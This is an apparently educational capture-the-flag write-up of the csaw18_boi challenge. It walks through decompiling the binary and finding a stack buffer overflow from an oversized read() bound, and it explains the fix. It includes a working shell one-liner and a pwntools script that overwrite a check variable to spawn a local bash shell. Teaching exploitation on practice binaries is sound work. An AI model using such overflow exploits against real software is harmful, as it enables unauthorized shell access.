Security CTF - Nightmare Module 04 - csaw18_boi

Introduction

Nightmare is a collection of security-related Capture the Flag (CTF) challenges focused on binary exploitation. They’re grouped into modules that each introduce new concepts in order of escalating complexity.

The goal of a security CTF challenge is to analyze a previously unknown program, and then exploit it in order to complete an objective. The goal is usually to extract a hidden value (i.e. the ‘flag’) from the challenge program, or to exploit the program to get an interactive shell.

Module 04 focuses on using stack buffer overflows to manipulate the values of variables on the stack. It consists of three CTF challenges: csaw18_boi, tamu_pwn1, tw17_justdoit.

This post documents my progress working through the csaw18_boi challenge. This challenge was part of Cybersecurity Awareness Worldwide’s (CSAW) 2018 Capture The Flag event.

Tools

csaw18_boi

The csaw18_boi challenge contains a binary file named boi. We start by gathering some basic information about the file.

file command

We learn that it’s a 64-bit ELF executable that is dynamically linked and hasn’t had its symbol information stripped from it (which makes reverse engineering it easier).

ctf@ctf2204:csaw18_boi$ file ./boi
boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1537584f3b2381e1b575a67cba5fbb87878f9711, not stripped

checksec

Checksec reveals that both the non-executable stack (NX/DEP) protection and a stack canary are enabled for this binary. PIE is not, so the binary loads at the fixed base address 0x400000.

ctf@ctf2204:csaw18_boi$ checksec ./boi
[*] '/home/ctf/projects/nightmare/modules/04-bof_variable/csaw18_boi/boi'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

main() Ghidra Decompiler Listing

I’ve used Ghidra to disassemble and decompile the binary. After some analysis and renaming of variables for clarity, the main() function’s decompilation is as follows.

// Variables have been renamed in Ghidra to clarify their usage
undefined8 main(void)

{
  long in_FS_OFFSET;
  undefined8 userInput;
  undefined8 stack_junk1;
  undefined4 stack_junk2;
  uint checkValue;
  undefined4 stack_junk3;
  long stack_canary;

  stack_canary = *(long *)(in_FS_OFFSET + 0x28);

  userInput = 0;
  stack_junk1 = 0;
  stack_junk2 = 0;
  stack_junk3 = 0;

  checkValue = 0xdeadbeef;

  puts("Are you a big boiiiii??");
  read(0,&userInput,0x18);

  if (checkValue == 0xcaf3baee) {
    run_cmd("/bin/bash");
  }
  else {
    run_cmd("/bin/date");
  }

  if (stack_canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

Analysis

run_cmd() is a function defined in this binary as a wrapper around system():

void run_cmd(char *param_1)

{
  system(param_1);
  return;
}

So the user enters input after which the program chooses between executing /bin/bash and /bin/date with system().

We want to get it to execute /bin/bash and get a shell.

The problem is that, based on the normal execution flow shown in the decompiler listing, the user input has no effect on checkValue. It only goes into userInput.

The key detail here is the number of bytes the read() call will accept. It reads up to 24 (0x18) bytes starting at the address of the stack-allocated variable userInput. If we look at the stack layout and tally up the memory that’s been allocated for each variable (Ghidra’s Stack Frame Editor gives a good view of the stack frame layout), it becomes apparent that the read() call will allow our user input to overflow beyond the stack memory allocated for userInput and into the memory meant for the checkValue variable used in the conditional logic. This will allow us to change the value of checkValue at runtime if we craft our input correctly, and as a result control the execution flow through the if statement.

The region of stack memory we’re interested in will look like this at runtime

Addr N       =========================
             = userInput   (8 bytes) =  <= read() starts writing bytes here, moving toward higher addresses ('down' in this diagram)
Addr N+0x08  =========================
             = stack_junk1 (8 bytes) =
Addr N+0x10  =========================
             = stack_junk2 (4 bytes) =
Addr N+0x14  =========================
             = checkValue  (4 bytes) =  <= the variable checked by the if statement
Addr N+0x18  =========================
             = stack_junk3 (4 bytes) =
             =========================
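The tally in the diagram above can be double-checked with a small model of the frame. This is only a sketch: the MainFrame structure is a hypothetical stand-in built from the renamed Ghidra variables and their sizes, not something that exists in the binary, and READ_SIZE is the 0x18 length passed to read().

```python
import ctypes


class MainFrame(ctypes.Structure):
    # Hypothetical model of the locals, in the order and sizes Ghidra reports.
    _fields_ = [
        ("userInput", ctypes.c_uint64),    # undefined8
        ("stack_junk1", ctypes.c_uint64),  # undefined8
        ("stack_junk2", ctypes.c_uint32),  # undefined4
        ("checkValue", ctypes.c_uint32),   # uint
        ("stack_junk3", ctypes.c_uint32),  # undefined4
    ]


READ_SIZE = 0x18  # third argument of read(0, &userInput, 0x18)

# Offset of every field relative to the start of userInput.
offsets = {name: getattr(MainFrame, name).offset for name, _ in MainFrame._fields_}
for name, off in offsets.items():
    print(f"{name:12s} +{off:#04x}")

# The read reaches checkValue if it covers the field's last byte.
check_end = offsets["checkValue"] + ctypes.sizeof(ctypes.c_uint32)
overflow_reaches_check = READ_SIZE >= check_end
print("read() covers checkValue:", overflow_reaches_check)
```

The offsets it prints should line up with the N+0x08, N+0x10, N+0x14 and N+0x18 boundaries in the diagram.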

So if we provide 20 bytes (0x14) of input we’ve filled everything right up until the start of checkValue. If we provide 4 more bytes for a total of 24 (0x18) we’ve filled everything up to and including the memory allocated on the stack for checkValue. This will allow us to ‘plant’ the value 0xcaf3baee and control execution through the if statement by making the comparison evaluate to true. Because x86-64 is little-endian, those last 4 bytes have to be sent least significant byte first: ee ba f3 ca.
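As a minimal sketch of that input, the payload can be built with Python’s standard struct module, which takes care of the byte order. The constant names here are my own for illustration; the values (20 bytes of padding, the 0xcaf3baee target and the 0x18 read size) come from the analysis above.

```python
import struct

OFFSET_TO_CHECK = 0x14   # bytes between the start of userInput and checkValue
TARGET = 0xcaf3baee      # value the if statement compares against
READ_SIZE = 0x18         # maximum number of bytes read() will accept

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
payload = b"A" * OFFSET_TO_CHECK + struct.pack("<I", TARGET)

print(len(payload))      # total length of the input
print(payload.hex())     # padding followed by ee ba f3 ca
```

The payload is exactly as long as the read() bound, so all of it lands in the frame in a single call.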

Exploitation

TLDR - The following command will successfully exploit the boi executable and overwrite the value of the checkValue variable with 0xcaf3baee:

ctf@ctf2204:csaw18_boi$ cat <(python3 -c "import sys;sys.stdout.buffer.write(b'A'*20+b'\xee\xba\xf3\xca')") - | ./boi
Are you a big boiiiii??
echo $$
1914
ps f
   PID TTY      STAT   TIME COMMAND
  1101 pts/2    Ss     0:00 -bash
  1177 pts/2    S+     0:00  \_ vim my_exploit.py
  1072 pts/1    Ss     0:00 -bash
  1909 pts/1    S+     0:00  \_ cat /dev/fd/63 -
  1911 pts/1    Z+     0:00  |   \_ [bash] <defunct>
  1910 pts/1    S+     0:00  \_ ./boi
  1913 pts/1    S+     0:00      \_ sh -c /bin/bash
  1914 pts/1    S+     0:00          \_ /bin/bash
  1916 pts/1    R+     0:00              \_ ps f
  1007 pts/0    Ss     0:00 -bash
  1069 pts/0    S+     0:00  \_ tmux

We see the “Are you a big boiiiii??” output from puts() and then the execution seems to pause and wait. It’s actually waiting for our input because it has spawned a bash shell. In the example above I’ve echoed $$ to show our current PID, and then displayed a process tree using ps f. We can see in the tree that the boi executable is PID 1910 and that it spawned a child process 1913 that ran sh -c /bin/bash (the call to system(), see the man page for system()). In turn, 1913 spawned a child process 1914, which is our actual bash shell.

So we’ve successfully diverted the execution flow of the if statement to spawn us a shell.

But that command is pretty gnarly. We’re using process substitution on our Python one-liner (PID 1911) and handing the result to cat as a file, along with a trailing ‘-’ argument that makes cat carry on reading from our terminal’s stdin so the shell doesn’t exit immediately. cat’s output is then piped into boi. Doing this sort of exploit directly in the shell can be tricky and frustrating to troubleshoot. Read more about the tricks to get it working here

This is where the pwntools framework really shines. It has a whole lot of functionality to interact with processes, redirect input/output, automate attaching a debugger, etc. It’s a Swiss Army knife for CTF and exploit development.

You’ll need to read the docs and play with it to really get up to speed with its capabilities. The Getting Started section runs through the main concepts.

Below is the Python script I wrote using pwntools to solve this challenge.

#!/usr/bin/env python3

from pwn import *
import os

log.info("My exploit script's PID: {}".format(os.getpid()))


# pwntools config telling it what command to use
# to spawn a new terminal when it needs one (e.g. for gdb.debug)
context.terminal = ["tmux", "new-window"]

# 0xcaf3baee in little-endian byte order
variable_overwrite_payload = b'\xee\xba\xf3\xca'

# run our target process under gdb

# io = gdb.debug("./boi", gdbscript='''
# set follow-fork-mode child
# b *main+103
# continue
# ''')

# or run our target process directly
# object returned & stored in 'io' lets us interact
# with the process programmatically
io = process("./boi")

log.info("Sending payload...")

# Send our payload to the process's stdin.
# At this point it's waiting at the read() call to receive input
# 20 bytes of the character 'A' + 4 bytes of the value 0xcaf3baee
io.send(b"A"*20+variable_overwrite_payload)

log.info("Sent.")

# drop into an interactive shell connected to the stdin/stdout
# of our target process
io.interactive()

Here is the output of running the script. Nice tidy output, no wild bash trickery to redirect stdin/stdout. The pwntools framework handles all of that for us and provides a nice, high-level scripting API.

ctf@ctf2204:csaw18_boi$ ./my_exploit.py
[*] My exploit script's PID: 1949
[+] Starting local process './boi': pid 1952
[*] Sending payload...
[*] Sent.
[*] Switching to interactive mode
Are you a big boiiiii??
$ echo $$
1955
$ ps f
    PID TTY      STAT   TIME COMMAND
   1101 pts/2    Ss     0:00 -bash
   1949 pts/2    Sl+    0:00  \_ python3 ./my_exploit.py
   1952 pts/3    Ss+    0:00      \_ ./boi
   1953 pts/3    S+     0:00          \_ sh -c /bin/bash
   1955 pts/3    S+     0:00              \_ /bin/bash
   1956 pts/3    R+     0:00                  \_ ps f
   1072 pts/1    Ss+    0:00 -bash
   1007 pts/0    Ss     0:00 -bash
   1069 pts/0    S+     0:00  \_ tmux

If we watch the process under GDB as it receives our input we can observe the variable being overwritten in the process memory.

I’ve set breakpoints just before the read() call occurs (address main+95) and just before the if statement comparison occurs (address main+103).

   0x000000000040068f <+78>:    lea    rax,[rbp-0x30]
   0x0000000000400693 <+82>:    mov    edx,0x18
   0x0000000000400698 <+87>:    mov    rsi,rax
   0x000000000040069b <+90>:    mov    edi,0x0
=> 0x00000000004006a0 <+95>:    call   0x400500 <read@plt>       <= break 1
   0x00000000004006a5 <+100>:   mov    eax,DWORD PTR [rbp-0x1c]
   0x00000000004006a8 <+103>:   cmp    eax,0xcaf3baee            <= break 2
   0x00000000004006ad <+108>:   jne    0x4006bb <main+122>
   0x00000000004006af <+110>:   mov    edi,0x40077c
   0x00000000004006b4 <+115>:   call   0x400626 <run_cmd>
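The disassembly also gives us an independent way to confirm the 20 bytes of padding, since both the buffer and the compared variable are addressed relative to rbp. The short calculation below is only a sketch of that arithmetic; the constant names are mine, and the values are read straight off the lea, mov edx and mov eax instructions in the listing.

```python
BUF_RBP_OFFSET = 0x30    # lea rax,[rbp-0x30]            -> start of userInput
CHECK_RBP_OFFSET = 0x1c  # mov eax,DWORD PTR [rbp-0x1c]  -> checkValue
READ_LEN = 0x18          # mov edx,0x18                  -> read() length

# Distance from the start of the buffer to checkValue.
padding = BUF_RBP_OFFSET - CHECK_RBP_OFFSET

# Bytes of our input that land on or after the start of checkValue.
bytes_past_padding = READ_LEN - padding

print(hex(padding), padding)
print(bytes_past_padding)
```

The result matches the layout worked out in Ghidra: 0x14 bytes of padding, followed by exactly the 4 bytes of checkValue.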

With the process waiting at main+95, just before the read() call, our stack looks like this:

gef➤  hexdump qword --size 5 $rsp
0x00007ffc544b7f90│+0x0000   0x00007ffc544b80e8
0x00007ffc544b7f98│+0x0008   0x0000000101000000
0x00007ffc544b7fa0│+0x0010   0x0000000000000000
0x00007ffc544b7fa8│+0x0018   0x0000000000000000
0x00007ffc544b7fb0│+0x0020   0xdeadbeef00000000

We can see the value 0xdeadbeef sitting there in stack memory on the last line. This is the value the variable checkValue was initialized to, and it is what we want to overwrite. It occupies the upper half of the qword shown at +0x0020, which puts checkValue itself at $rsp+0x24 (little-endian). The specific stack addresses will vary on each run due to ASLR, but the relative offset of the variable’s memory from the top of the stack ($rsp) at this breakpoint always remains the same.

When we continue to our next breakpoint at main+103, after the read() call, at the comparison operation for the if statement, our stack looks like this:

gef➤  hexdump qword --size 5 $rsp
0x00007ffdd7e88970│+0x0000   0x00007ffdd7e88ac8
0x00007ffdd7e88978│+0x0008   0x0000000100000000
0x00007ffdd7e88980│+0x0010   0x4141414141414141
0x00007ffdd7e88988│+0x0018   0x4141414141414141
0x00007ffdd7e88990│+0x0020   0xcaf3baee41414141

Starting at offset +0x0010 we see the value 41 repeating. These are the 20 ‘A’ characters we sent as part of our input. 0x41 is the hex ASCII code for ‘A’.

And on the last line of the output above we can confirm that we did in fact overwrite checkValue with the value from our input. We see 0xcaf3baee there.
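To see why the last qword reads 0xcaf3baee41414141, it can help to split it back into the bytes that actually sit in memory. The following is a small sketch using Python’s struct module; the variable names are mine, and the qword value is copied from the GDB output above.

```python
import struct

qword = 0xcaf3baee41414141  # value GDB shows at $rsp+0x20 after the read()

# Lay the qword out in memory order (little-endian), lowest address first.
raw = struct.pack("<Q", qword)
print(raw.hex(" "))

# Reinterpret the same 8 bytes as two consecutive 32-bit values.
low_dword, high_dword = struct.unpack("<II", raw)
print(hex(low_dword))   # bytes at $rsp+0x20: the last four 'A's (stack_junk2)
print(hex(high_dword))  # bytes at $rsp+0x24: checkValue
```

The lower address holds the tail end of our padding and the higher address holds the planted value, which is the order in which we sent them.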

This causes the conditional’s equality check to evaluate to true, so the program executes /bin/bash and gives us a shell.

Conclusion

This challenge presents a pretty straightforward stack buffer overflow caused by an incorrect bound on the read() call. This makes it possible to overwrite the variable adjacent to our input buffer, which is then used in subsequent conditional logic. Gaining control of the value of this variable using crafted input lets us affect the execution flow of the program through this conditional logic.

The fix would be to read no more bytes than the amount of memory that has been allocated as an input buffer. In this example they have set a bound on the number of bytes to read, but it’s too large a value for the amount of memory they’ve allocated on the stack.
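The effect of the bound can be illustrated with a small simulation. This is a sketch in Python rather than a patch to the C source, and it rests on assumptions: simulate_read is a hypothetical helper that models the frame as a flat byte array using the offsets from the analysis above, and since the source-level size of the buffer isn’t known here, the "fixed" bound of 0x14 is simply the largest value that stops short of checkValue.

```python
import struct

CHECK_OFFSET = 0x14  # offset of checkValue from the start of userInput
FRAME_SIZE = 0x1c    # userInput through stack_junk3


def simulate_read(data: bytes, bound: int) -> int:
    """Copy at most `bound` bytes of `data` into a modelled frame and
    return the resulting value of checkValue."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, CHECK_OFFSET, 0xdeadbeef)  # initial value
    n = min(len(data), bound)
    frame[:n] = data[:n]  # what read(0, &userInput, bound) would store
    return struct.unpack_from("<I", frame, CHECK_OFFSET)[0]


payload = b"A" * 20 + struct.pack("<I", 0xcaf3baee)

vulnerable = simulate_read(payload, 0x18)        # bound used by the binary
bounded = simulate_read(payload, CHECK_OFFSET)   # bound that stops at checkValue

print(hex(vulnerable))
print(hex(bounded))
```

With the original bound the modelled checkValue takes on our planted value, while with the smaller bound it keeps its initial 0xdeadbeef and the program would run /bin/date.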

This challenge represents ‘baby steps’ towards exploiting more complex buffer overflows that involve gaining control of a stack frame’s return address. No security mitigations needed to be bypassed to solve this one (DEP/NX, ASLR, PIE). As mentioned above, a stack canary is present and checksec indicates that NX is enabled, but since we only needed to overwrite an adjacent variable to influence an existing conditional check, and the 24-byte read ends right after checkValue, we never came into contact with these security features.

More on these in upcoming posts. Stay tuned!